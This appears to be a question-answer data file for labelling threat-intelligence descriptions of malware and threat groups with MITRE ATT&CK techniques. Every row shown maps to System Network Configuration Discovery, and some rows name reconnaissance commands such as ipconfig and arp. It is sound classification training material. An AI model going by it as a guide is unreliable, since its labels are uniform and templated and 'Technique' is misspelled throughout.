+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 actors use NBTscan to discover vulnerable systems.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has used scripts to collect the host's network topology.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla surveys a system upon check-in to discover network configuration details using the arp -a, nbtstat -n, net config, ipconfig /all, and route commands, as well as NBTscan. Turla RPC backdoors have also retrieved registered RPC interface information from process memory.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has executed multiple commands to enumerate network topology and settings including `ipconfig`, `netsh interface firewall show all`, and `netsh interface portproxy show all`.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used ipconfig to identify the network configuration of a victim machine. Wizard Spider has also used the PowerShell cmdlet `Get-ADComputer` to collect IP address data from Active Directory.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used a tool to enumerate proxy settings in the target environment.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: admin@338 actors used the following command after exploiting a machine with LOWBALL malware to acquire information about local networks: ipconfig /all >> %temp%\download,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used several tools to scan for open NetBIOS nameservers and enumerate NetBIOS sessions.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Action RAT has the ability to collect the MAC address of an infected host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AdFind can extract subnet information from Active Directory.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can collect the IP address of the victim machine and spawn instances of netsh.exe to enumerate wireless settings.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent.btz collects the network adapter’s IP and MAC address as well as IP addresses of the network adapter’s default gateway, primary/secondary WINS, DHCP, and DNS servers, and saves them into a log file.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey can identify the IP address of a victim machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor can determine the public IP and location of a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can identify the IP of a targeted system.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to identify the location, public IP address, and domain name on a compromised host.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Arp can be used to display ARP configuration information on the host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth collects the external IP address from the system.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon can collect the external IP address of the victim.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avenger can identify the domain of the compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Azorult can collect host IP information from the victim’s machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADCALL collects the network adapter information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADFLICK has captured victim IP address details.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has collected the victim machine's local IP address information and MAC address.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT can collect IP information from the victim’s machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BabyShark has executed the ipconfig /all command.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Backdoor.Oldrea collects information about the Internet adapter configuration.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook has a command to get the public IP address from a system.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can collect the IP address and NetBIOS name of an infected machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal can execute ipconfig on the victim’s machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy has gathered information about network IP configurations using ipconfig.exe and about routing tables using route.exe.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bonadan can find the external IP address of the infected host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoxCaon can collect the victim's MAC address by using the GetAdaptersInfo API.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brave Prince gathers network configuration information as well as the ARP cache.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Calisto runs the ifconfig command to obtain the IP address from the victim’s machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon can collect the IP address of the victims and other computers on the network using the commands: ipconfig -all nbtstat -n, and nbtstat -s.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Catchamas gathers the Mac address, IP address, and the network adapter information from the victim’s machine.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Caterpillar WebShell can gather the IP address from the victim's machine using the IP config command.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower has the ability to use ipconfig to enumerate system network settings.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chrommme can enumerate the IP address of a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can enumerate the IP address of a compromised machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can determine the NetBios name and the IP addresses of targets machines including domain controllers.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie uses ipconfig /all and route PRINT to identify network adapter and interface information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conti can retrieve the ARP cache from the local system by using the GetIpNetTable() API call and check to ensure IP addresses it connects to are for local, non-Internet, systems.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can collect DNS information from the targeted system.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CreepySnail can use `getmac` and `Get-NetIPAddress` to enumerate network settings.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson contains a command to collect the victim MAC address and LAN IP.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba can retrieve the ARP cache from the local system by using GetIpNetTable.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink can use the Linux API `if_nameindex` to gather network interface names.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEADEYE can discover the DNS domain name of a targeted system.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis uses ipconfig to gather the IP address from the system.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol can enumerate victims' local and external IPs when registering with C2.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack can collect the host's IP addresses using the ipconfig command.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The reconnaissance modules used with Duqu can collect information on network configuration.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dyre has the ability to identify network settings on a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EKANS can determine the domain of a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elise executes ipconfig /all after initial communication is made to the remote server.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emissary has the capability to execute the command ipconfig /all.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can acquire network configuration information like DNS servers, public IP, and network proxies used by a host.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic uses the nbtstat -n and nbtstat -s commands on the victim’s machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Explosive has collected the MAC address from the victim's machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FALLCHILL collects MAC address and local IP address information from the victim.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT collects information about the network including the IP address and DHCP server.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke can identify the MAC address on the target computer.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Felismus collects the victim LAN IP address and sends it to the C2 server.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro has been used to execute the ipconfig /all command on a victim system.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can parse the `ProxyServer` string in the Registry to discover http proxies.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GeminiDuke collects information on network settings and Internet proxy settings from the victim.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldMax retrieved a list of the system's network interface after execution.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can determine the IP and physical location of the compromised host via IPinfo.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT collects the victim IP address, MAC address, as well as the victim account domain name.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert can obtain proxy information from a victim's machine using system environment variables.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent can enumerate the IP and domain of a target system.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has the ability to identify the IP address of the compromised machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq creates a backdoor through which remote attackers can retrieve IP addresses of compromised machines.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The IceApple ifconfig module can iterate over all network interfaces on the host and retrieve the name, description, MAC address, DNS suffix, DNS servers, gateways, IPv4 addresses, and subnet masks.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer’s 61850 payload component enumerates connected network adapters and their corresponding IP addresses.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole gathers information on the IP forwarding table, MAC address, configured proxy, and network SSID.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ixeshe enumerates the IP address, network proxy settings, and domain name from a victim's system.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A JHUHUGIT variant gathers network interface card information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN can obtain network information, including DNS, IP, and proxies.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYMARBLE gathers the MAC address of the victim’s machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI can collect the IP address from the victim’s machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOPILUWAK can use Arp to discover a target's network configuration setttings.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar gathers information about network adapters.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kessel has collected the DNS address of the infected host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can collect the MAC address and other information from a victim machine using `ipconfig/all`.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy can determine the public or WAN IP address for the system.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can retrieve the contents of the IP routing table as well as information about the Windows domain.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kobalos can record the IP address of the target machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs collects network adapter and interface information by using the commands ipconfig /all, arp -a and route print. It also collects the system's MAC address with getmac and domain configuration with net config workstation.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron gathers information about network adapters using the Win32 API call GetAdaptersInfo.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LiteDuke has the ability to discover the proxy configuration of Firefox and/or Opera.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar can retrieve network information from a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has the ability to discover the domain name of the infected host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner used a script to gather the IP address of the infected machine before sending to the C2.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can collect the IP address of a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa can collect IP addresses from a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete collects the MAC address of the target computer and other network configuration information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can use the `GetAdaptersInfo` function to retrieve information about network adapters and the `GetIpNetTable` function to retrieve the IPv4 to physical network address mapping table.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan can run `C:\Windows\system32\cmd.exe /c cmd /c ipconfig /all 2>&1` to discover network settings.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type may create a file containing the results of the command cmd.exe /c ipconfig /all.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoonWind obtains the victim IP address.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: More_eggs has the capability to gather the IP address from the victim's machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito uses the ipconfig command.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NBTscan can be used to collect MAC addresses.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can collect the IP address of a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NGLite identifies the victim system MAC and IPv4 addresses and uses these to establish a victim identifier.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NOKKI can gather information on the victim IP address.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naid collects the domain name from a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanHaiShu can gather information about the victim proxy server.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanoCore gathers the IP address from the victim’s machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Neoichor can gather the IP address from an infected host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja can enumerate the IP address on compromised systems.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nltest may be used to enumerate the parent domain of a local machine using /parentdomain.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSInfo discovers the current domain information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D can collect the network interface MAC address on the infected host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OceanSalt can collect the victim’s IP address.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus can collect the host IP address from the victim’s machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum can collect network information, including the host IP address, DNS, and proxy information.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Olympic Destroyer uses API calls to enumerate the infected system's ARP table.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Orz can gather victim proxy information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLAINTEE uses the ipconfig /all command to gather the victim’s IP address.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS can retrieve IP, network adapter configuration information, and domain from compromised hosts.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER may collect network configuration data by running ipconfig /all on a victim.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pay2Key can identify the IP and MAC addresses of the compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare can obtain the proxy settings of a compromised machine using `InternetQueryOptionA` and its IP address by running `nslookup myip.opendns.comresolver1.opendns.com\r\n`.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Penquin can report the IP of the compromised host to attacker controlled infrastructure.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PingPull can retrieve the IP address of a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon can collect and send the local IP address, RDP information, and the network adapter physical address as a part of its C2 beacon.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pisloader has a command to collect the victim's IP address.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 can enumerate network adapter information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerDuke has a command to get the victim's domain and NetBIOS name.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerShower has the ability to identify the current Windows domain of the infected host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A module in Prikormka collects information from the victim about its IP addresses and MAC addresses.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proxysvc collects the network adapter information and domain/username information based on current remote sessions.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy has built in commands to identify a host’s IP address and find out other network configuration settings by viewing connected sessions.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pysa can perform network reconnaissance using the Advanced IP Scanner tool.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT gathers the current domain the victim system belongs to.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUIETCANARY can identify the default proxy setting on a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use net config workstation, arp -a, `nslookup`, and ipconfig /all to gather network configuration information.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT has the ability to enumerate the Wide Area Network (WAN) IP through requests to ip-api[.]com, freegeoip[.]net, or api[.]ipify[.]org observed with user-agent string `Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0`.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RATANKBA gathers the victim’s IP address via the ipconfig -all command.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can use ipconfig and Arp to collect network configuration information, including routing information and ARP tables.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Reaver collects the victim's IP address.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RedLeaves can obtain information about network parameters.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec can obtain information about network configuration, including the routing table, ARP cache, and DNS cache.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT collects the IP address and MAC address from the system.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
